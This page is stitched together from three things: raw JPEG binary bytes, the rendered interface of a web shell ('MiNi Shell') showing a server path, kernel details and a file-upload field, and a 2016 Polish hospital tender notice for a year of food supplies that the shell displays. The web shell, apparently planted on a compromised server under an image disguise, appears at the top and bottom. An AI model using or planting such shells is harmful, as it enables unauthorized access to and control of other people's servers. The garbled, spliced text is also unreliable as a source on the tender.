JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160108/5914-N-2016.html

<p class="kh_header"><b>Morąg: Dostawę artykułów spożywczych do Szpitala Miejskiego w Morągu Sp. z o.o. nr sprawy 1/2016</b><br>
<b>Numer ogłoszenia: 5914 - 2016; data zamieszczenia: 08.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Morągu Spółka z ograniczoną odpowiedzialnością , ul. Dąbrowskiego 16, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 89 7574231, faks 89 7574593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalmorag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp.zo.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę artykułów spożywczych do Szpitala Miejskiego w Morągu Sp. z o.o. nr sprawy 1/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet  1 .  Pieczywo
1 Chleb  zwykły krojony	         kg	7300
2Chleb razowy	kg	900
3 Bułka tarta 	         kg	90
Pakiet  2 .  Mleko i jego  przetwory
1Mleko UHT 2 % tłuszczu karton	l	12 500
2Śmietana  ukwaszona 18 procent tł.(400 ml)	l300
3Masło  śmietankowe  82 procent tł.	kg	450
4Twaróg  półtłusty	kg	800
5Ser  żółty pełnotłust kg	500
6Ser  topiony  śmietankowy  (trójkąt)8szt w opakowaniu  po 25 gram	op	1200
7.Ser  topiony  śmietankowy (plastry)
8 szt w opakowaniu  150gram	op	1200
8Ser topiony kostka 100 gram	szt	1200
9Masło roślinne 0,25 kg	kg	450
Pakiet  3  .  Produkty zbożowe i ich przetwory
1Mąka  pszenna  typ 550	kg	600
2Mąka  ziemniaczana	kg	120
3Mąka  kukurydziana	kg	30
4Płatki owsiane zwykłe	kg	360
5Płatki jęczmienne zwykłe 	kg	360
6Ryż biały	kg	600
7Makaron świderki	kg	360
8Makaron  krajanka	kg	480
9Kasza kukurydziana	kg	20
10Kasza manna	kg	480
11Kasza jęczmienna 	kg	480
12Kasza jęczmienna pęczak	kg	60
13Kasza gryczana	kg	60
14Kleik ryżowy ( 170 g)	szt	360
Pakiet  4 Tłuszcze
1 Olej rzepakowy  1 l	szt	480
2 Olej  słonecznikowy 1 l 	szt	300
2 Majonez 280 g	szt	150
Pakiet  5.  Cukier
1 Cukier paczkowany 	kg	1200
2 Cukier puder  (0,4 kg)	kg	20
Pakiet  6. Wędlina 
1Polędwica z warzywami	kg	400
2Szynka drobiowa z fileta	kg	400
3Szynka drobiowa mielona kg	400
4Szynka wieprzowa mielona	kg	400
5Szynka  wieprzowa 	kg	400
6Luncheonkg	400
7Parówki cienkie -powyżej 50 procent mięsa	kg	400
8Kiełbasa zwyczajna kg	100
9Pasztetowa drobiowa 	kg	600
10Pasztet pieczony  z indyka kg	600
11Szynka konserwowa	kg	400
12Kiełbasa krakowska parzona kg	400
13Boczek  wędzony kg	120
14Kiełbasa szynkowa 	kg	400
Pakiet  7 Przyprawy i inne produkty spożywcze
1Sól  warzona miałka 	kg	360
2Kwasek cytrynowy  20 g	szt	360
3Przyprawa  jarzynka  200 g	szt	400
4Majeranek 20 g	szt	120
5Pieprz ziołowy  20 g	szt	200
6Pieprz  naturalny mielony  20 g	szt	200
7Przyprawa  maggi 1 l	szt	180
8Cukier waniliowy  16 g	szt	120
9Musztarda serepska 180 g	szt	300
10Kisiel  40 g	szt	1000
11Kawa  zbożowa  0,5 kg	kg	150
12Fasola  Jaś kg	200
13Fasola biała drobna	kg	90
14Groch połówki	kg	90
15Herbata  granulowana 100 g	kg	140
16Herbata ekspresowa 100 szt 	op	12
17Liść  laurowy  18 g	op	100
18Ziele angielskie 20 g	op	240
19Miód  (jednorazowe opakowanie 25 g)	szt	2400
20Ocet  0,5 l	szt	500
21Kakao naturalne ciemne 100 g	kg	20
22Koper  suszony   ( 200 g)	kg	5
23Pietruszka nać suszona ( 200 g)	kg	5
24Woda mineralna gazowana  1,5 l	szt	2500
25Woda mineralna niegazowana 1,5 l	szt	2500
26Cynamon mielony (20 g)	szt	50
27Papryka  słodka ( 20 g) 	szt	100
28Żelatyna (50 g)	szt	100
29Budyń (40 g)	szt	500
30Syrop -sok  owocowy (1 l)	szt	100
31Chrupki  kukurydziane ( 250 g)	szt	300
32Herbatniki  paczkowane( 100 g)	szt	300
33Płatki  kukurydziane (1 kg )	szt	200
34Sałatka szwedzka - (słoik  400 -500 g)	szt	200
35Biszkopty okrągłe 	kg	300
36Zioła  prowansalskie  (10g)	szt	60
37Przyprawa do kurczaka	szt	60
38Czosnek granulowany (20 g)	szt	60
39Pieprz czarny ziarnisty (20 g )	szt	200
Pakiet  8 .  Ryby
1Panga  biała	kg	300
2Sola 	kg	300
Pakiet  9  Mrożonki
1Kalafior  mrożony kg 360
2Fasolka szparagowa zielona cięta  mrożona  kg 360
3Mieszanka warzywna 7 składnikowa kg 360
4Mieszanka kompotowa kg	120
5Brokuł   mrożony kg	360
6Szpinak kg	300
7Marchew z groszkiem	kg	360
Pakiet 10. Mięso 
1Łopatka wieprzowa b k 	kg	1200
2Schab z k	kg	400
3Karkówka  wieprzowa  z kością 	kg	400
4Boczek surowy 	kg	120
5Żeberka paski	kg	400
6Smalec wieprzowy kostka 0,25 kg	kg	50
Pakiet :  11 . Drób 
1Kurczak świeży 	kg	1000
2Ćwiartka - kurczaka	kg	2000
3Porcja rosołowa	kg	500
4Wątróbka  drobiowa  z  indyka  	kg	300
5Wątróbka drobiowa z kurczaka	kg	300
6Filet z piersi  kurczaka 	kg	400
7Udo kurczaka	kg	2000
Pakiet   12  Warzywa 
1Ziemniaki	kg 	14500
2.Marchew 	kg	5800
3Seler	kg	480
4Pietruszka	kg	480
5Buraki  ćwikłowe 	kg	2500
6Por	kg	240
7 Kapusta biała 	kg	600
8Jabłka	kg	1500
9Cebula	kg	120
10Kapusta  pekińska 	kg	200
11Pieczarka 	kg	100
12Kapusta  czerwona 	kg	50
Pakiet   13.  Warzywa  kiszone
1Ogórek kiszony	kg	150
2Kapusta kiszona	kg	200
Pakiet  14 Przetwory owocowe i warzywne 
1Dżem  poj. 260 g	szt.	300
2Dżem(jednorazowe opakowanie 25 g)	szt	2400
3Groszek konserwowy  400 g	szt	600
4Kukurydza konserwowa 400 g	szt	600
5Koncentrat pomidorowy 0,9 l  - 30%	szt	300
6Koncentrat pomidorowy  180 g - 30 %	szt	300
7Szczaw  słoik 260-280 g	szt	200
Pakiet  15 Jajka 
1Jajka  kat Lszt20000.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje udzielenie zamówień uzupełniających stanowiących przedmiot zamówienia  nie przekraczających 20% wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.51.10.00-3, 15.61.33.00-1, 15.40.00.00-2, 15.83.00.00-5, 15.13.11.30-5, 15.87.00.00-7, 15.22.10.00-3, 15.33.11.00-8, 15.11.00.00-2, 15.11.20.00-6, 15.33.21.00-5, 15.33.10.00-7, 03.14.25.00-3, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących  tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- Oświadczenie o  obowiązujących w  zakładzie zasadach systemu HACCP - analizy zagrożeń i    krytycznych  punktów kontroli wg. wzoru- załącznik nr 6
 Nie dotyczy zadania 12
 - decyzję  o przystosowaniu środka transportu do przewożenia artykułów spożywczych   
   Nie dotyczy zadania 12</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz ofertowy i cenowy  - załącznik nr 1 i 2 do SIWZ
2.W przypadku, gdy umocowanie do reprezentowania wykonawcy nie wynika ze  stosownego   dokumentu, a w szczególności z odpisu z właściwego rejestru, należy załączyć stosowne pełnomocnictwo.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a /zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena    netto  pozostanie bez  zmian; 
b/Zmiany wymienione w ppkt a), następują z mocy prawa i obowiązują od dnia obowiązywania   odpowiednich przepisów
c/ strony dopuszczają zmianę cen jednostkowych asortymentu objętego umową  w przypadku  zmiany wielkości opakowania wprowadzonej przez producenta  z zachowaniem zasady  proporcjonalności w stosunku do ceny objętej umową.
d/    przedłużenia terminu obowiązywania umowy do chwili wyczerpania się wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmorag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Morągu Spółka  z  ograniczoną  odpowiedzialnością 
ul. Dąbrowskiego 16      
14-300 Morąg
Budynek administracji, pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2016 godzina 10:45, miejsce: Szpital Miejski w Morągu Spółka  z  ograniczoną  odpowiedzialnością 
ul. Dąbrowskiego 16      
14-300 Morąg
Budynek administracji, pokój nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com